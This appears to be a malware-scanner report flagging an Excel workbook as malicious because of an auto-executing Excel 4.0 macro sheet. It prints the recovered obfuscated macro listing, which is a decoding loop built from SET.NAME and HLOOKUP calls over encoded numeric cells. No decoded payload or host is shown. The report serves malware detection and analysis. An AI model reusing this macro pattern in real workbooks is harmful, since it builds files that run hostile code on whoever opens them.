MALICIOUS
Risk Score: 140
Heuristics: 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6686 bytes |

SHA-256: 69c8084372806916cfb209997fdb1c9b285ca4c39fb6a623e52430401419121b
Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - KLkKUn
' 0018 23 LABEL : Cell Value, String Constant - AKpVuBvi len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G173
' 0018 23 LABEL : Cell Value, String Constant - BrvfFGIu len=0
' 0018 20 LABEL : Cell Value, String Constant - cctFK len=0
' 0018 26 LABEL : Cell Value, String Constant - CJveNgKvFuH len=0
' 0018 23 LABEL : Cell Value, String Constant - cWAcOTbX len=0
' 0018 20 LABEL : Cell Value, String Constant - HoPxg len=0
' 0018 22 LABEL : Cell Value, String Constant - IugDnFm len=0
' 0018 21 LABEL : Cell Value, String Constant - NNYinM len=0
' 0018 22 LABEL : Cell Value, String Constant - nYnDLbV len=0
' 0018 21 LABEL : Cell Value, String Constant - omFnvS len=0
' 0018 20 LABEL : Cell Value, String Constant - OrhMW len=0
' 0018 27 LABEL : Cell Value, String Constant - pgaeRTghJGNR len=0
' 0018 20 LABEL : Cell Value, String Constant - phBrd len=0
' 0018 25 LABEL : Cell Value, String Constant - PoGMkwrjGk len=0
' 0018 23 LABEL : Cell Value, String Constant - pvnbwEqN len=0
' 0018 25 LABEL : Cell Value, String Constant - RnZUZvAQFl len=0
' 0018 24 LABEL : Cell Value, String Constant - tVRgPweoz len=0
' 0018 23 LABEL : Cell Value, String Constant - uEIJcfVS len=0
' 0018 23 LABEL : Cell Value, String Constant - vGtGIQju len=0
' 0018 26 LABEL : Cell Value, String Constant - xNYDrFUaKci len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' KLkKUn,G76,"SET.NAME("AKpVuBvi",0+VALUE("0"))",""
' KLkKUn,G79,"SET.NAME("IugDnFm",AKpVuBvi)",""
' KLkKUn,G82,"SET.NAME("RnZUZvAQFl",AKpVuBvi)",""
' KLkKUn,G86,"SET.NAME("xNYDrFUaKci",COUNTA(vGtGIQju))",""
' KLkKUn,P87,"",-673.00000000000000000000
' KLkKUn,P88,"",162.00000000000000000000
' KLkKUn,P89,"",-653.00000000000000000000
' KLkKUn,G90,"SET.NAME("omFnvS",COUNTA(OrhMW))",""
' KLkKUn,P90,"",801.00000000000000000000
' KLkKUn,P91,"",-677.00000000000000000000
' KLkKUn,P92,"",-828.00000000000000000000
' KLkKUn,G94,[],""
' KLkKUn,G98,"SET.NAME("NNYinM","")",""
' KLkKUn,G103,"IugDnFm",""
' KLkKUn,G106,"SET.NAME("CJveNgKvFuH",HLOOKUP("*",vGtGIQju,IugDnFm,FALSE))",""
' KLkKUn,G108,"cWAcOTbX",""
' KLkKUn,G111,"SET.NAME("nYnDLbV",AKpVuBvi)",""
' KLkKUn,G115,[],""
' KLkKUn,G119,"nYnDLbV",""
' KLkKUn,G123,"tVRgPweoz",""
' KLkKUn,G126,"PoGMkwrjGk",""
' KLkKUn,G129,"BrvfFGIu",""
' KLkKUn,G133,"SET.NAME("pgaeRTghJGNR",VALUE(HLOOKUP("*",OrhMW,BrvfFGIu,FALSE)))",""
' KLkKUn,G136,"pvnbwEqN",""
' KLkKUn,G141,"NNYinM",""
' KLkKUn,G144,"RnZUZvAQFl",""
' KLkKUn,G148,NEXT(),""
' KLkKUn,G153,"phBrd",""
' KLkKUn,G157,[],""
' KLkKUn,G161,"HoPxg",""
' KLkKUn,G166,NEXT(),""
' KLkKUn,G168,RETURN(),""
' KLkKUn,G197,"SET.NAME("uEIJcfVS",G76)",""
' KLkKUn,G199,"vGtGIQju",""
' KLkKUn,G203,"SET.NAME("OrhMW",R63C15)",""
' KLkKUn,G207,"SET.NAME("HoPxg",216)",""
' KLkKUn,G210,"SET.NAME("cctFK",7)",""
' KLkKUn,G215,uEIJcfVS(),""
' KLkKUn,G216,HALT(),""